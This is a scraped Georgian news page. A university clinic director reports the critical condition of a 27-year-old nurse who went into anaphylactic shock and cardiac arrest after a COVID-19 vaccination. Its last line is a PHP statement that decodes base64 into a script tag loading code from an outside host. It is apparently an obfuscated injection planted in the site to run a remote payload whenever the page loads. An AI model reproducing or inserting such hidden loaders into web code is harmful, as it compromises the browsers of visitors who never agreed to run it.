celsiusi
ავერსი შნაიდერი
თსსუ-ს პირველი საუნივერსიტეტო კლინიკის გენერალური დირექტორი ლევან რატიანის თქმით, დადებითი ეფექტი კლინიკურ პარამეტრებში აღარ არის და პაციენტის მდგომარეობა  კრიტიკულად მძიმეა.
 
მინდა გითხრათ, რომ ამ წუთებში პაციენტის მდგომარეობა არის კრიტიკული. კლინიკურად სახეზეა გულის გაჩერების წარმატებული აღდგენა. აღნიშნული მდგომარეობა გამოწვეულია როგორც ანამნეზიდან ირკვევა ანაფილაქსიური შოკის არსებობით. ამ ეტაპზე, გრძელდება პროტოკოლით გათვალისწინებული ღონისძიებები, მაგრამ მინდა გითხრათ რომ დადებითი ეფექტი, ამ ეტაპზე, კლინიკურ პარამეტრებში აღარ გაგვაჩნია. ნებისმიერ დროს შეიიძლება ჩვენდა სამწუხაროდ, დასრულდეს გულის გაჩერებით კვლავ, - განაცხადა ლევან რატიანმა.
 
შეგახსენებთ, ახალციხის კლინიკაში 27 წლის ექთანი მეგი ბაქრაძე COVID-19-ის საწინააღმდეგო აცრის გაკეთებიდან დაახლოებით 30-40 წუთში კომაში ჩავარდა. მეგი ბაქრაძე თბილისში პირველ საუნივერსიტეტო კლინიკაში გუშინ საღამოს კატასტროფის მედიცინის ბრიგადის ეკიპაჟმა ჩამოიყვანა.
 
 
 
1378
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");